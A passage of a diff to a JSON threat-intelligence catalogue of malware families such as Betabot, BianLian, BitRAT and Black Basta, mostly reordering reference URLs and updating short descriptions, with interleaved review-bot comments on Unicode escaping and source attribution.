+ "description": "Cybereason concludes that Betabot is a sophisticated infostealer malware that\u2019s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim\u2019s machine and steal sensitive information.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot",
- "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
- "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en",
- "http://www.xylibox.com/2015/04/betabot-retrospective.html",
- "https://krabsonsecurity.com/2022/03/28/betabot-in-the-rearview-mirror/",
 "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
 "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html",
+ "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39",
 "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt",
 "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html",
- "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39"
+ "http://www.xylibox.com/2015/04/betabot-retrospective.html",
+ "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en",
+ "https://krabsonsecurity.com/2022/03/28/betabot-in-the-rearview-mirror/"
 ],
 "synonyms": [
 "Neurevt"
@@ -15159,9 +15857,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt",
- "https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/",
+ "https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger",
 "https://www.bitdefender.com/files/News/CaseStudies/study/411/Bitdefender-PR-Whitepaper-CyberWallet-creat5874-en-EN.pdf",
- "https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger"
+ "https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/"
 ],
 "synonyms": [],
 "type": []
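Review bot: The only change to the Betabot description in the `@@ -15104` hunk is that the literal `’` is now written as the escape `\u2019`; the decoded string is byte-identical, so this diff line is escaping churn rather than a content change. It suggests the writer switched to ASCII-escaped output (the `ensure_ascii=True` default of Python's `json.dump`, or its equivalent) for this update while the old line was written unescaped, and the new BianLian description in the `@@ -15170` hunk uses the escaped form as well. Whichever policy is chosen, it should be applied to the whole file in one pass so that later regenerations do not keep flipping the same lines back and forth.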
@@ -15170,15 +15868,16 @@
 "value": "BHunt"
 },
 {
- "description": "",
+ "description": "BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization\u2019s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims\u2019 systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian",
 "https://twitter.com/malwrhunterteam/status/1558548947584548865",
+ "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/",
 "https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/",
- "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
 "https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye",
- "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/"
+ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/"
 ],
 "synonyms": [],
 "type": []
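Review bot: The new BianLian description is an unattributed paragraph that reads as if stitched from several write-ups, whereas the neighbouring entries in this patch open with their source (`According to PCrisk, …`, `According to Symantec, …`, `Cybereason concludes …`). Opening it the same way — `According to <vendor>, BianLian is a GoLang-based ransomware …` — keeps the attribution convention consistent and lets a reader judge the claims. The sentences about valid RDP credentials, FTP/Rclone/Mega exfiltration and the January 2023 shift to exfiltration-only extortion are advisory-style statements; the source they were taken from may not be among the six URLs in `refs`, so it should be added there if it is missing.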
@@ -15191,8 +15890,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware",
- "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/",
- "http://zirconic.net/2018/07/bi_d-ransomware/"
+ "http://zirconic.net/2018/07/bi_d-ransomware/",
+ "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/"
 ],
 "synonyms": [],
 "type": []
@@ -15219,13 +15918,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates",
+ "https://habrahabr.ru/post/213973/",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf",
+ "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
+ "https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html",
 "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf",
 "https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server",
- "https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html",
- "https://securelist.com/versatile-ddos-trojan-for-linux/64361/",
 "https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/",
- "https://habrahabr.ru/post/213973/",
- "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/"
+ "https://securelist.com/versatile-ddos-trojan-for-linux/64361/"
 ],
 "synonyms": [],
 "type": []
@@ -15238,8 +15938,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen",
- "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood",
- "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Binanen-B/detailed-analysis.aspx"
+ "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Binanen-B/detailed-analysis.aspx",
+ "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood"
 ],
 "synonyms": [],
 "type": []
@@ -15252,10 +15952,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata",
- "https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
 "https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
- "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
- "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/"
+ "https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/",
+ "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/"
 ],
 "synonyms": [],
 "type": []
@@ -15310,11 +16010,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath",
+ "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
 "https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/",
 "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/",
- "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a",
- "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a"
 ],
 "synonyms": [],
 "type": []
@@ -15327,8 +16027,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock",
- "https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/",
 "https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview",
+ "https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/",
 "https://twitter.com/malwrhunterteam/status/1215252402988822529"
 ],
 "synonyms": [],
@@ -15343,8 +16043,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran",
 "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf",
- "https://content.fireeye.com/apt/rpt-apt38",
- "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
+ "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html",
+ "https://content.fireeye.com/apt/rpt-apt38"
 ],
 "synonyms": [
 "SHADYCAT"
@@ -15359,12 +16059,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat",
- "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
- "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
- "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
 "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
- "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan"
+ "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
+ "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan",
+ "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html"
 ],
 "synonyms": [],
 "type": []
@@ -15373,35 +16073,37 @@
 "value": "Bitter RAT"
 },
 {
- "description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyer’s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRAT’s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.",
+ "description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyer\u2019s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRAT\u2019s popularity arises from its versatility. 
The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
 "https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/",
- "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2023/01/03/bitrat-now-sharing-sensitive-bank-data-as-a-lure",
 "https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://community.riskiq.com/article/ade260c6",
- "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
- "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/",
+ "https://asec.ahnlab.com/en/32781/",
 "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md",
 "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
"https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/", - "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", + "https://community.riskiq.com/article/ade260c6", + "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware", + "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/", - "https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/", - "https://asec.ahnlab.com/en/32781/", + "https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/", + "https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/", + "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", "https://www.youtube.com/watch?v=CYm3g4zkQdw", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/", + "https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + 
"https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", - "https://blog.qualys.com/vulnerabilities-threat-research/2023/01/03/bitrat-now-sharing-sensitive-bank-data-as-a-lure", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/" ], "synonyms": [], "type": [] 
@@ -15443,33 +16145,35 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta",
 "https://gbhackers.com/black-basta-ransomware/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
- "https://securelist.com/luna-black-basta-ransomware/106950",
 "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
- "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware",
- "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware",
- "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/",
- "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
- "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/",
- "https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
- "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies",
- "https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware",
- "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
- "https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/",
- "https://www.zscaler.com/blogs/security-research/back-black-basta",
- 
"https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", - "https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html", - "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta", "https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/", - "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/", + "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/", + "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview", "https://securityscorecard.pathfactory.com/all/a-deep-dive-into-bla", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/", + "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies", "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/" + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + 
"https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", + "https://www.zscaler.com/blogs/security-research/back-black-basta", + "https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", + "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta", + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", + "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://securelist.com/luna-black-basta-ransomware/106950", + "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/", + "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/", + "https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/" ], "synonyms": [ "no_name_software" 
@@ -15484,26 +16188,28 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte",
- "https://twitter.com/splinter_code/status/1628057204954652674",
- "https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants",
- "https://redcanary.com/blog/blackbyte-ransomware/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
 "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.ic3.gov/Media/News/2022/220211.pdf",
+ "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/",
+ "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups",
 "https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/",
- "https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html",
- "https://de.darktrace.com/blog/detecting-the-unknown-revealing-uncategorised-ransomware-using-darktrace",
- 
"https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure", + "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/", + "https://www.ic3.gov/Media/News/2022/220211.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", "https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/", - "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups" + "https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html", + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure", + "https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants", + "https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html", + "https://twitter.com/splinter_code/status/1628057204954652674", + "https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/", + "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", + "https://de.darktrace.com/blog/detecting-the-unknown-revealing-uncategorised-ransomware-using-darktrace" ], "synonyms": [], "type": [] 
@@ -15516,57 +16222,62 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat",
+ "https://blog.group-ib.com/blackcat",
+ "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.varonis.com/blog/alphv-blackcat-ransomware",
+ "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://killingthebear.jorgetesta.tech/actors/alphv",
+ "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
+ "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/",
+ "https://unit42.paloaltonetworks.com/blackcat-ransomware/",
 "https://www.intrinsec.com/alphv-ransomware-gang-analysis",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
+ "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/",
+ "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor",
 "https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware",
 "https://id-ransomware.blogspot.com/2021/12/blackcat-ransomware.html",
- "https://www.intrinsec.com/alphv-ransomware-gang-analysis/",
- "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3",
- 
"https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", - "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", - "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf", - "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809", - "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", - "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/", - "https://www.varonis.com/blog/alphv-blackcat-ransomware", - "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/", - "https://securelist.com/a-bad-luck-blackcat/106254/", - "https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/", "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf", - "https://www.ic3.gov/Media/News/2022/220420.pdf", - "https://www.mandiant.com/resources/blog/alphv-ransomware-backup", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html", + "https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html", + "https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html", + "https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/", "https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/", - 
